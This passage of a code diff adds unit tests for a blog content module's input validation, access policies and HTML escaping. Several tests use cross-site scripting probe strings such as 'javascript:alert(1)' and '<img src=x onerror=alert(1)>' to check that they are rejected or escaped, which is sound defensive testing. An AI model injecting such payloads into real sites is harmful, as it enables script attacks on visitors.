+  test("isSignificantContentChange is true when title changes", () => {
+    expect(isSignificantContentChange({ title: "New title" })).toBe(true);
+  });
+
+  test("isSignificantContentChange is true when contentJson changes", () => {
+    expect(isSignificantContentChange({ contentJson: { blocks: [] } })).toBe(
+      true
+    );
+  });
+
+  test("isSignificantContentChange is true when contentText changes", () => {
+    expect(isSignificantContentChange({ contentText: "New body" })).toBe(true);
+  });
+
+  test("isSignificantContentChange is false for an empty input (e.g. a PATCH touching only cosmetic fields)", () => {
+    expect(isSignificantContentChange({})).toBe(false);
+  });
+});

--- a/tests/blog-content-pages-terms-validation.test.ts
+++ b/tests/blog-content-pages-terms-validation.test.ts
@@ -1,0 +1,242 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  isPageType,
+  PAGE_TYPES
+} from "../src/modules/blog-content/domain/page-type";
+import {
+  validateCreateBlogPageInput,
+  validateUpdateBlogPageInput
+} from "../src/modules/blog-content/domain/blog-page-validation";
+import {
+  validateCreateBlogTermInput,
+  validateUpdateBlogTermInput
+} from "../src/modules/blog-content/domain/blog-term-validation";
+import { validateDeleteReasonInput } from "../src/modules/blog-content/domain/content-validation";
+import { evaluatePageUpdateAccess } from "../src/modules/blog-content/domain/page-access-policy";
+import { evaluatePostUpdateAccess } from "../src/modules/blog-content/domain/post-access-policy";
+import type { TenantContext } from "../src/modules/identity-access/domain/access-control";
+
+describe("page-type", () => {
+  test("recognizes all four page types", () => {
+    for (const type of PAGE_TYPES) {
+      expect(isPageType(type)).toBe(true);
+    }
+    expect(isPageType("bogus")).toBe(false);
+  });
+});
+
+describe("validateCreateBlogPageInput", () => {
+  const BASE = {
+    title: "About",
+    slug: "about",
+    contentJson: {},
+    contentText: "body"
+  };
+
+  test("accepts a minimal valid payload with defaults", () => {
+    const result = validateCreateBlogPageInput(BASE);
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.pageType).toBe("standard");
+      expect(result.value.parentPageId).toBeNull();
+      expect(result.value.menuOrder).toBe(0);
+    }
+  });
+
+  test("accepts an explicit pageType/parentPageId/menuOrder", () => {
+    const parentId = "11111111-1111-1111-1111-111111111111";
+    const result = validateCreateBlogPageInput({
+      ...BASE,
+      pageType: "landing",
+      parentPageId: parentId,
+      menuOrder: 5
+    });
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.pageType).toBe("landing");
+      expect(result.value.parentPageId).toBe(parentId);
+      expect(result.value.menuOrder).toBe(5);
+    }
+  });
+
+  test("rejects an invalid pageType", () => {
+    const result = validateCreateBlogPageInput({ ...BASE, pageType: "bogus" });
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toContain("pageType");
+    }
+  });
+
+  test("rejects a negative or non-integer menuOrder", () => {
+    const negative = validateCreateBlogPageInput({ ...BASE, menuOrder: -1 });
+    expect(negative.valid).toBe(false);
+
+    const fractional = validateCreateBlogPageInput({ ...BASE, menuOrder: 1.5 });
+    expect(fractional.valid).toBe(false);
+  });
+
+  test("rejects a non-UUID parentPageId", () => {
+    const result = validateCreateBlogPageInput({
+      ...BASE,
+      parentPageId: "not-a-uuid"
+    });
+    expect(result.valid).toBe(false);
+  });
+});
+
+describe("validateUpdateBlogPageInput", () => {
+  const PAGE_ID = "22222222-2222-2222-2222-222222222222";
+
+  test("accepts an empty payload", () => {
+    const result = validateUpdateBlogPageInput({}, PAGE_ID);
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value).toEqual({});
+    }
+  });
+
+  test("rejects a page being its own parent", () => {
+    const result = validateUpdateBlogPageInput(
+      { parentPageId: PAGE_ID },
+      PAGE_ID
+    );
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors[0]?.field).toBe("parentPageId");
+    }
+  });
+
+  test("allows clearing parentPageId to null", () => {
+    const result = validateUpdateBlogPageInput({ parentPageId: null }, PAGE_ID);
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.parentPageId).toBeNull();
+    }
+  });
+});
+
+describe("validateCreateBlogTermInput", () => {
+  test("accepts a valid category with a parentId", () => {
+    const parentId = "33333333-3333-3333-3333-333333333333";
+    const result = validateCreateBlogTermInput({
+      taxonomyType: "category",
+      name: "News",
+      slug: "news",
+      parentId
+    });
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.parentId).toBe(parentId);
+    }
+  });
+
+  test("rejects a tag with a parentId", () => {
+    const result = validateCreateBlogTermInput({
+      taxonomyType: "tag",
+      name: "Featured",
+      slug: "featured",
+      parentId: "33333333-3333-3333-3333-333333333333"
+    });
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toContain("parentId");
+    }
+  });
+
+  test("rejects a missing taxonomyType", () => {
+    const result = validateCreateBlogTermInput({
+      name: "News",
+      slug: "news"
+    });
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toContain(
+        "taxonomyType"
+      );
+    }
+  });
+
+  test("rejects an invalid slug", () => {
+    const result = validateCreateBlogTermInput({
+      taxonomyType: "tag",
+      name: "Featured",
+      slug: "Not Valid!"
+    });
+    expect(result.valid).toBe(false);
+  });
+});
+
+describe("validateUpdateBlogTermInput", () => {
+  test("accepts an empty payload", () => {
+    const result = validateUpdateBlogTermInput({});
+    expect(result.valid).toBe(true);
+  });
+
+  test("rejects taxonomyType: tag combined with a non-null parentId in the same request", () => {
+    const result = validateUpdateBlogTermInput({
+      taxonomyType: "tag",
+      parentId: "33333333-3333-3333-3333-333333333333"
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("allows taxonomyType: category combined with a parentId", () => {
+    const result = validateUpdateBlogTermInput({
+      taxonomyType: "category",
+      parentId: "33333333-3333-3333-3333-333333333333"
+    });
+    expect(result.valid).toBe(true);
+  });
+});
+
+describe("validateDeleteReasonInput", () => {
+  test("requires a non-empty reason", () => {
+    expect(validateDeleteReasonInput({}).valid).toBe(false);
+    expect(validateDeleteReasonInput({ reason: "   " }).valid).toBe(false);
+  });
+
+  test("trims a valid reason", () => {
+    const result = validateDeleteReasonInput({ reason: "  spam  " });
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.reason).toBe("spam");
+    }
+  });
+});
+
+const BASE_CONTEXT: TenantContext = {
+  tenantId: "tenant-1",
+  tenantUserId: "user-1",
+  identityId: "identity-1",
+  roles: []
+};
+
+describe("evaluatePageUpdateAccess", () => {
+  test("allows when granted blog_content.pages.update, regardless of authorship", () => {
+    const decision = evaluatePageUpdateAccess(
+      BASE_CONTEXT,
+      new Set(["blog_content.pages.update"]),
+      { authorTenantUserId: "someone-else", status: "published" }
+    );
+    expect(decision.allowed).toBe(true);
+  });
+
+  test("allows the author to edit their own unpublished page without the permission", () => {
+    const decision = evaluatePageUpdateAccess(BASE_CONTEXT, new Set(), {
+      authorTenantUserId: BASE_CONTEXT.tenantUserId,
+      status: "draft"
+    });
+    expect(decision.allowed).toBe(true);
+    expect(decision.matchedPolicy).toBe("author_own_draft_allow");
+  });
+
+  test("does not leak into the posts guard (pages permission alone does not grant posts update)", () => {
+    const decision = evaluatePostUpdateAccess(
+      BASE_CONTEXT,
+      new Set(["blog_content.pages.update"]),
+      { authorTenantUserId: "someone-else", status: "draft" }
+    );
+    expect(decision.allowed).toBe(false);
+  });
+});

--- a/tests/blog-content-posts-validation.test.ts
+++ b/tests/blog-content-posts-validation.test.ts
@@ -1,0 +1,195 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  validateCreateBlogPostInput,
+  validateScheduleBlogPostInput,
+  validateSoftDeleteBlogPostInput,
+  validateUpdateBlogPostInput
+} from "../src/modules/blog-content/domain/blog-post-validation";
+import { evaluatePostUpdateAccess } from "../src/modules/blog-content/domain/post-access-policy";
+import type { TenantContext } from "../src/modules/identity-access/domain/access-control";
+
+const BASE_CONTEXT: TenantContext = {
+  tenantId: "tenant-1",
+  tenantUserId: "user-1",
+  identityId: "identity-1",
+  roles: []
+};
+
+describe("validateCreateBlogPostInput", () => {
+  test("accepts a minimal valid payload and applies defaults", () => {
+    const result = validateCreateBlogPostInput({
+      title: "Hello",
+      slug: "hello",
+      contentJson: {},
+      contentText: "body"
+    });
+
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.visibility).toBe("public");
+      expect(result.value.featuredMediaId).toBeNull();
+      expect(result.value.seoTitle).toBeNull();
+    }
+  });
+
+  test("rejects an invalid visibility value", () => {
+    const result = validateCreateBlogPostInput({
+      title: "Hello",
+      slug: "hello",
+      contentJson: {},
+      contentText: "body",
+      visibility: "bogus"
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toContain("visibility");
+    }
+  });
+
+  test("rejects a non-UUID featuredMediaId", () => {
+    const result = validateCreateBlogPostInput({
+      title: "Hello",
+      slug: "hello",
+      contentJson: {},
+      contentText: "body",
+      featuredMediaId: "not-a-uuid"
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toContain(
+        "featuredMediaId"
+      );
+    }
+  });
+
+  test("propagates core validation errors (e.g. missing title)", () => {
+    const result = validateCreateBlogPostInput({
+      slug: "hello",
+      contentJson: {},
+      contentText: "body"
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toContain("title");
+    }
+  });
+});
+
+describe("validateUpdateBlogPostInput", () => {
+  test("accepts an empty payload (nothing to update)", () => {
+    const result = validateUpdateBlogPostInput({});
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value).toEqual({});
+    }
+  });
+
+  test("validates only the fields present in the body", () => {
+    const result = validateUpdateBlogPostInput({ slug: "new-slug" });
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value).toEqual({ slug: "new-slug" });
+    }
+  });
+
+  test("rejects an invalid slug without requiring title", () => {
+    const result = validateUpdateBlogPostInput({ slug: "Not Valid!" });
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toEqual(["slug"]);
+    }
+  });
+
+  test("allows clearing a nullable field (featuredMediaId: null)", () => {
+    const result = validateUpdateBlogPostInput({ featuredMediaId: null });
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value).toEqual({ featuredMediaId: null });
+    }
+  });
+});
+
+describe("validateScheduleBlogPostInput", () => {
+  test("accepts a future ISO datetime", () => {
+    const future = new Date(Date.now() + 60_000).toISOString();
+    const result = validateScheduleBlogPostInput({ scheduledAt: future });
+    expect(result.valid).toBe(true);
+  });
+
+  test("rejects a past datetime", () => {
+    const past = new Date(Date.now() - 60_000).toISOString();
+    const result = validateScheduleBlogPostInput({ scheduledAt: past });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects a missing scheduledAt", () => {
+    const result = validateScheduleBlogPostInput({});
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects an unparseable datetime string", () => {
+    const result = validateScheduleBlogPostInput({ scheduledAt: "not-a-date" });
+    expect(result.valid).toBe(false);
+  });
+});
+
+describe("validateSoftDeleteBlogPostInput", () => {
+  test("requires a non-empty reason", () => {
+    expect(validateSoftDeleteBlogPostInput({}).valid).toBe(false);
+    expect(validateSoftDeleteBlogPostInput({ reason: "  " }).valid).toBe(false);
+  });
+
+  test("accepts and trims a valid reason", () => {
+    const result = validateSoftDeleteBlogPostInput({ reason: "  spam  " });
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.reason).toBe("spam");
+    }
+  });
+});
+
+describe("evaluatePostUpdateAccess", () => {
+  test("allows when the role permission is granted, regardless of authorship", () => {
+    const decision = evaluatePostUpdateAccess(
+      BASE_CONTEXT,
+      new Set(["blog_content.posts.update"]),
+      { authorTenantUserId: "someone-else", status: "published" }
+    );
+
+    expect(decision.allowed).toBe(true);
+    expect(decision.matchedPolicy).toBe("role_permission");
+  });
+
+  test("allows the author to edit their own unpublished draft without the role permission", () => {
+    const decision = evaluatePostUpdateAccess(BASE_CONTEXT, new Set(), {
+      authorTenantUserId: BASE_CONTEXT.tenantUserId,
+      status: "draft"
+    });
+
+    expect(decision.allowed).toBe(true);
+    expect(decision.matchedPolicy).toBe("author_own_draft_allow");
+  });
+
+  test("denies the author editing their own post once it is published", () => {
+    const decision = evaluatePostUpdateAccess(BASE_CONTEXT, new Set(), {
+      authorTenantUserId: BASE_CONTEXT.tenantUserId,
+      status: "published"
+    });
+
+    expect(decision.allowed).toBe(false);
+  });
+
+  test("denies a non-author without the role permission", () => {
+    const decision = evaluatePostUpdateAccess(BASE_CONTEXT, new Set(), {
+      authorTenantUserId: "someone-else",
+      status: "draft"
+    });
+
+    expect(decision.allowed).toBe(false);
+    expect(decision.matchedPolicy).toBe("default_deny");
+  });
+});

--- a/tests/blog-content-presentation-domain.test.ts
+++ b/tests/blog-content-presentation-domain.test.ts
@@ -1,0 +1,319 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  validateCreateTemplateInput,
+  validateTemplateLayout,
+  validateUpdateTemplateInput
+} from "../src/modules/blog-content/domain/template-policy";
+import {
+  validateMenuItemsInput,
+  isMenuLinkType
+} from "../src/modules/blog-content/domain/menu-policy";
+import {
+  isWidgetPosition,
+  validateCreateWidgetInput
+} from "../src/modules/blog-content/domain/widget-policy";
+import {
+  isAdPlacementType,
+  validateAdPlacementsInput,
+  validateCreateAdInput
+} from "../src/modules/blog-content/domain/ad-policy";
+import {
+  isBlogThemeMode,
+  validateUpdateThemeSettingsInput
+} from "../src/modules/blog-content/domain/theme-policy";
+import type { TemplateLayout } from "../src/modules/blog-content/domain/template-policy";
+
+const VALID_LAYOUT: TemplateLayout = { columns: 2, sidebarPosition: "right" };
+
+describe("template-policy", () => {
+  test("validateTemplateLayout accepts a whitelisted shape", () => {
+    expect(validateTemplateLayout(VALID_LAYOUT)).toEqual({
+      valid: true,
+      value: VALID_LAYOUT
+    });
+  });
+
+  test("validateTemplateLayout rejects an out-of-range columns value", () => {
+    expect(
+      validateTemplateLayout({ columns: 5, sidebarPosition: "left" }).valid
+    ).toBe(false);
+  });
+
+  test("validateTemplateLayout rejects an unknown sidebarPosition", () => {
+    expect(
+      validateTemplateLayout({ columns: 1, sidebarPosition: "top" }).valid
+    ).toBe(false);
+  });
+
+  test("validateCreateTemplateInput accepts a valid payload", () => {
+    const result = validateCreateTemplateInput({
+      key: "landing-hero",
+      name: "Landing Hero",
+      layoutJson: VALID_LAYOUT
+    });
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.isActive).toBe(true);
+    }
+  });
+
+  test("validateCreateTemplateInput rejects an invalid key format", () => {
+    const result = validateCreateTemplateInput({
+      key: "Not A Slug!",
+      name: "X",
+      layoutJson: VALID_LAYOUT
+    });
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((e) => e.field)).toContain("key");
+    }
+  });
+
+  test("validateUpdateTemplateInput accepts a partial payload", () => {
+    const result = validateUpdateTemplateInput({ isActive: false });
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value).toEqual({ isActive: false });
+    }
+  });
+});
+
+describe("menu-policy", () => {
+  test("isMenuLinkType recognizes post, page, url only", () => {
+    expect(isMenuLinkType("post")).toBe(true);
+    expect(isMenuLinkType("bogus")).toBe(false);
+  });
+
+  test("validateMenuItemsInput accepts a flat list of url items", () => {
+    const result = validateMenuItemsInput([
+      {
+        id: "11111111-1111-1111-1111-111111111111",
+        parentItemId: null,
+        label: "Home",
+        linkType: "url",
+        url: "https://example.com",
+        sortOrder: 0
+      }
+    ]);
+    expect(result.valid).toBe(true);
+  });
+
+  test("validateMenuItemsInput rejects an unsafe/relative url for a url link", () => {
+    const result = validateMenuItemsInput([
+      {
+        id: "11111111-1111-1111-1111-111111111111",
+        parentItemId: null,
+        label: "Home",
+        linkType: "url",
+        url: "javascript:alert(1)",
+        sortOrder: 0
+      }
+    ]);
+    expect(result.valid).toBe(false);
+  });
+
+  test("validateMenuItemsInput requires targetId for post/page links", () => {
+    const result = validateMenuItemsInput([
+      {
+        id: "11111111-1111-1111-1111-111111111111",
+        parentItemId: null,
+        label: "Post",
+        linkType: "post",
+        sortOrder: 0
+      }
+    ]);
+    expect(result.valid).toBe(false);
+  });
+
+  test("validateMenuItemsInput rejects a parentItemId not present in the batch", () => {
+    const result = validateMenuItemsInput([
+      {
+        id: "11111111-1111-1111-1111-111111111111",
+        parentItemId: "22222222-2222-2222-2222-222222222222",
+        label: "Child",
+        linkType: "url",
+        url: "https://example.com",
+        sortOrder: 0
+      }
+    ]);
+    expect(result.valid).toBe(false);
+  });
+
+  test("validateMenuItemsInput rejects nesting deeper than one level", () => {
+    const result = validateMenuItemsInput([
+      {
+        id: "11111111-1111-1111-1111-111111111111",
+        parentItemId: null,
+        label: "Root",
+        linkType: "url",
+        url: "https://example.com",
+        sortOrder: 0
+      },
+      {
+        id: "22222222-2222-2222-2222-222222222222",
+        parentItemId: "11111111-1111-1111-1111-111111111111",
+        label: "Child",
+        linkType: "url",
+        url: "https://example.com",
+        sortOrder: 1
+      },
+      {
+        id: "33333333-3333-3333-3333-333333333333",
+        parentItemId: "22222222-2222-2222-2222-222222222222",
+        label: "Grandchild",
+        linkType: "url",
+        url: "https://example.com",
+        sortOrder: 2
+      }
+    ]);
+    expect(result.valid).toBe(false);
+  });
+
+  test("validateMenuItemsInput accepts a valid one-level tree", () => {
+    const result = validateMenuItemsInput([
+      {
+        id: "11111111-1111-1111-1111-111111111111",
+        parentItemId: null,
+        label: "Root",
+        linkType: "url",
+        url: "https://example.com",
+        sortOrder: 0
+      },
+      {
+        id: "22222222-2222-2222-2222-222222222222",
+        parentItemId: "11111111-1111-1111-1111-111111111111",
+        label: "Child",
+        linkType: "url",
+        url: "https://example.com",
+        sortOrder: 1
+      }
+    ]);
+    expect(result.valid).toBe(true);
+  });
+
+  test("validateMenuItemsInput rejects a duplicate id in the batch", () => {
+    const item = {
+      id: "11111111-1111-1111-1111-111111111111",
+      parentItemId: null,
+      label: "A",
+      linkType: "url",
+      url: "https://example.com",
+      sortOrder: 0
+    };
+    const result = validateMenuItemsInput([item, { ...item, label: "B" }]);
+    expect(result.valid).toBe(false);
+  });
+});
+
+describe("widget-policy", () => {
+  test("isWidgetPosition recognizes the five valid positions", () => {
+    expect(isWidgetPosition("sidebar")).toBe(true);
+    expect(isWidgetPosition("bogus")).toBe(false);
+  });
+
+  test("validateCreateWidgetInput accepts a valid payload", () => {
+    const result = validateCreateWidgetInput({
+      position: "sidebar",
+      title: "About",
+      bodyText: "Plain text body."
+    });
+    expect(result.valid).toBe(true);
+  });
+
+  test("validateCreateWidgetInput rejects unsafe bodyText", () => {
+    const result = validateCreateWidgetInput({
+      position: "footer",
+      title: "X",
+      bodyText: "<script>alert(1)</script>"
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("validateCreateWidgetInput rejects an invalid position", () => {
+    const result = validateCreateWidgetInput({
+      position: "top",
+      title: "X"
+    });
+    expect(result.valid).toBe(false);
+  });
+});
+
+describe("ad-policy", () => {
+  test("isAdPlacementType recognizes the four valid types", () => {
+    expect(isAdPlacementType("global")).toBe(true);
+    expect(isAdPlacementType("bogus")).toBe(false);
+  });
+
+  test("validateCreateAdInput accepts a valid payload", () => {
+    const result = validateCreateAdInput({
+      name: "Sponsor",
+      imageUrl: "https://cdn.example.com/ad.png",
+      linkUrl: "https://sponsor.example.com"
+    });
+    expect(result.valid).toBe(true);
+  });
+
+  test("validateCreateAdInput rejects a relative imageUrl", () => {
+    const result = validateCreateAdInput({
+      name: "Sponsor",
+      imageUrl: "/ad.png"
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("validateCreateAdInput rejects endsAt before startsAt", () => {
+    const result = validateCreateAdInput({
+      name: "Sponsor",
+      imageUrl: "https://cdn.example.com/ad.png",
+      startsAt: "2026-06-01T00:00:00Z",
+      endsAt: "2026-05-01T00:00:00Z"
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("validateAdPlacementsInput requires targetId for non-global placements", () => {
+    const result = validateAdPlacementsInput([{ placementType: "post" }]);
+    expect(result.valid).toBe(false);
+  });
+
+  test("validateAdPlacementsInput rejects a targetId on a global placement", () => {
+    const result = validateAdPlacementsInput([
+      {
+        placementType: "global",
+        targetId: "11111111-1111-1111-1111-111111111111"
+      }
+    ]);
+    expect(result.valid).toBe(false);
+  });
+
+  test("validateAdPlacementsInput accepts a mix of global and targeted placements", () => {
+    const result = validateAdPlacementsInput([
+      { placementType: "global" },
+      {
+        placementType: "widget",
+        targetId: "11111111-1111-1111-1111-111111111111"
+      }
+    ]);
+    expect(result.valid).toBe(true);
+  });
+});
+
+describe("theme-policy", () => {
+  test("isBlogThemeMode recognizes light, dark, system", () => {
+    expect(isBlogThemeMode("dark")).toBe(true);
+    expect(isBlogThemeMode("bogus")).toBe(false);
+  });
+
+  test("validateUpdateThemeSettingsInput accepts a valid mode", () => {
+    const result = validateUpdateThemeSettingsInput({ mode: "dark" });
+    expect(result.valid).toBe(true);
+  });
+
+  test("validateUpdateThemeSettingsInput rejects a missing/invalid mode", () => {
+    expect(validateUpdateThemeSettingsInput({}).valid).toBe(false);
+    expect(validateUpdateThemeSettingsInput({ mode: "blue" }).valid).toBe(
+      false
+    );
+  });
+});

--- a/tests/blog-content-public-rendering.test.ts
+++ b/tests/blog-content-public-rendering.test.ts
@@ -1,0 +1,927 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  collectRenderableGalleryMediaObjectIds,
+  collectRenderableVideoNewsThumbnailMediaObjectIds,
+  renderContentJsonToHtml
+} from "../src/modules/blog-content/domain/content-block-rendering";
+import {
+  deriveArticleSectionAndTags,
+  resolveCanonicalUrl,
+  resolveMetaDescription,
+  resolveOgImageUrl,
+  resolveOgLocale,
+  resolveRobotsMetaContent,
+  resolveSeoTitle
+} from "../src/modules/blog-content/domain/seo-rendering";
+import {
+  renderPaginationNavHtml,
+  renderPostSummaryListHtml,
+  renderPublicPageShell
+} from "../src/modules/blog-content/domain/public-page-rendering";
+import { escapeHtml } from "../src/lib/html/escape";
+
+describe("escapeHtml", () => {
+  test("escapes all five special characters", () => {
+    expect(escapeHtml(`&<>"'`)).toBe("&amp;&lt;&gt;&quot;&#39;");
+  });
+});
+
+describe("renderContentJsonToHtml", () => {
+  test("renders a paragraph block, escaped", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [{ type: "paragraph", text: "<script>alert(1)</script>" }]
+    });
+    expect(html).toBe("<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>");
+  });
+
+  test("renders a heading with a valid level", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [{ type: "heading", level: 2, text: "Hello" }]
+    });
+    expect(html).toBe("<h2>Hello</h2>");
+  });
+
+  test("skips a heading with an out-of-range level", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [{ type: "heading", level: 9, text: "Hello" }]
+    });
+    expect(html).toBe("");
+  });
+
+  test("renders an unordered and ordered list", () => {
+    const unordered = renderContentJsonToHtml({
+      blocks: [{ type: "list", items: ["a", "b"] }]
+    });
+    expect(unordered).toBe("<ul><li>a</li><li>b</li></ul>");
+
+    const ordered = renderContentJsonToHtml({
+      blocks: [{ type: "list", ordered: true, items: ["a"] }]
+    });
+    expect(ordered).toBe("<ol><li>a</li></ol>");
+  });
+
+  test("renders a quote block, escaped", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [{ type: "quote", text: "To be & not to be" }]
+    });
+    expect(html).toBe("<blockquote>To be &amp; not to be</blockquote>");
+  });
+
+  test("silently skips an unknown block type", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [{ type: "raw_html", html: "<script>evil()</script>" }]
+    });
+    expect(html).toBe("");
+  });
+
+  test("never emits a script/iframe/embed/object tag regardless of input", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [
+        { type: "paragraph", text: "<iframe src=evil></iframe>" },
+        { type: "list", items: ["<embed src=evil>", "<object data=evil>"] },
+        { type: "quote", text: "<img src=x onerror=alert(1)>" }
+      ]
+    });
+    // Safety property: every "<" that came from user content is escaped to
+    // "&lt;" — so no *unescaped* opening tag can ever reach the browser's
+    // HTML parser, regardless of what tag/attribute name appears inside
+    // the now-inert escaped text (e.g. "&lt;img ... onerror=...&gt;" is
+    // literal text, not a parsed <img> element).
+    expect(html).not.toContain("<script");
+    expect(html).not.toContain("<iframe");
+    expect(html).not.toContain("<embed");
+    expect(html).not.toContain("<object");
+    expect(html).not.toContain("<img");
+    expect(html).toContain("&lt;iframe");
+    expect(html).toContain("&lt;img");
+  });
+
+  test("returns empty string when blocks is missing or not an array", () => {
+    expect(renderContentJsonToHtml({})).toBe("");
+    expect(renderContentJsonToHtml({ blocks: "not-an-array" })).toBe("");
+  });
+
+  test("renders a gallery block with image and video items (Issue #542)", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [
+        {
+          type: "gallery",
+          items: [
+            {
+              mediaType: "image",
+              url: "https://cdn.example.com/a.jpg",
+              caption: "A & B"
+            },
+            { mediaType: "video", url: "https://cdn.example.com/a.mp4" }
+          ]
+        }
+      ]
+    });
+    expect(html).toContain('<img src="https://cdn.example.com/a.jpg"');
+    expect(html).toContain("A &amp; B");
+    expect(html).toContain(
+      '<video src="https://cdn.example.com/a.mp4" controls>'
+    );
+  });
+
+  test("skips a gallery item with an unsafe/relative URL", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [
+        {
+          type: "gallery",
+          items: [
+            { mediaType: "image", url: "javascript:alert(1)" },
+            { mediaType: "image", url: "/relative/path.jpg" }
+          ]
+        }
+      ]
+    });
+    expect(html).toBe("");
+  });
+
+  test("skips a gallery item with an invalid mediaType", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [
+        {
+          type: "gallery",
+          items: [{ mediaType: "audio", url: "https://cdn.example.com/a.mp3" }]
+        }
+      ]
+    });
+    expect(html).toBe("");
+  });
+
+  test("returns null for an empty gallery items array", () => {
+    expect(
+      renderContentJsonToHtml({ blocks: [{ type: "gallery", items: [] }] })
+    ).toBe("");
+  });
+
+  test("Issue #636: renders an image gallery item using mediaObjectId, resolved via the resolvedMediaUrls map", () => {
+    const contentJson = {
+      blocks: [
+        {
+          type: "gallery",
+          items: [
+            {
+              mediaType: "image",
+              mediaObjectId: "11111111-1111-1111-1111-111111111111",
+              caption: "R2 image"
+            }
+          ]
+        }
+      ]
+    };
+    const resolvedMediaUrls = new Map([
+      [
+        "11111111-1111-1111-1111-111111111111",
+        "https://media.example.test/news-media/tenant/2026/07/a.jpg"
+      ]
+    ]);
+
+    const html = renderContentJsonToHtml(contentJson, resolvedMediaUrls);
+    expect(html).toContain(
+      '<img src="https://media.example.test/news-media/tenant/2026/07/a.jpg"'
+    );
+    expect(html).toContain("R2 image");
+  });
+
+  test("Issue #636: skips an image gallery item whose mediaObjectId is not in resolvedMediaUrls (unresolved/unsafe/absent — never a broken <img>)", () => {
+    const contentJson = {
+      blocks: [
+        {
+          type: "gallery",
+          items: [
+            {
+              mediaType: "image",
+              mediaObjectId: "22222222-2222-2222-2222-222222222222"
+            }
+          ]
+        }
+      ]
+    };
+
+    expect(renderContentJsonToHtml(contentJson, new Map())).toBe("");
+    expect(renderContentJsonToHtml(contentJson)).toBe("");
+  });
+
+  test("Issue #636: mediaObjectId takes precedence over url when both happen to be present", () => {
+    const contentJson = {
+      blocks: [
+        {
+          type: "gallery",
+          items: [
+            {
+              mediaType: "image",
+              mediaObjectId: "33333333-3333-3333-3333-333333333333",
+              url: "https://untrusted.example.com/a.jpg"
+            }
+          ]
+        }
+      ]
+    };
+    const resolvedMediaUrls = new Map([
+      [
+        "33333333-3333-3333-3333-333333333333",
+        "https://media.example.test/trusted.jpg"
+      ]
+    ]);
+
+    const html = renderContentJsonToHtml(contentJson, resolvedMediaUrls);
+    expect(html).toContain('src="https://media.example.test/trusted.jpg"');
+    expect(html).not.toContain("untrusted.example.com");
+  });
+
+  test("Issue #639: renders a video_news block as a safe youtube-nocookie.com iframe embed, never the raw stored fields", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: "dQw4w9WgXcQ",
+          title: "Breaking <news>",
+          caption: "A & caption",
+          sourceLabel: "Reuters"
+        }
+      ]
+    });
+    expect(html).toContain(
+      '<iframe src="https://www.youtube-nocookie.com/embed/dQw4w9WgXcQ"'
+    );
+    expect(html).toContain("Breaking &lt;news&gt;");
+    expect(html).toContain("A &amp; caption");
+    expect(html).toContain("Reuters");
+    expect(html).not.toContain("<news>");
+  });
+
+  test("Issue #639: renders the resolved custom thumbnail <img> when thumbnailMediaObjectId resolves", () => {
+    const contentJson = {
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
+          videoId: "dQw4w9WgXcQ",
+          thumbnailMediaObjectId: "11111111-1111-1111-1111-111111111111"
+        }
+      ]
+    };
+    const resolvedMediaUrls = new Map([
+      [
+        "11111111-1111-1111-1111-111111111111",
+        "https://media.example.test/news-media/tenant/2026/07/thumb.jpg"
+      ]
+    ]);
+
+    const html = renderContentJsonToHtml(contentJson, resolvedMediaUrls);
+    expect(html).toContain(
+      '<img class="video-news-thumbnail" src="https://media.example.test/news-media/tenant/2026/07/thumb.jpg"'
+    );
+    expect(html).toContain(
+      '<iframe src="https://www.youtube-nocookie.com/embed/dQw4w9WgXcQ"'
+    );
+  });
+
+  test("Issue #639: omits the thumbnail <img> entirely when thumbnailMediaObjectId does not resolve", () => {
+    const html = renderContentJsonToHtml({
+      blocks: [
+        {
+          type: "video_news",
+          provider: "youtube",
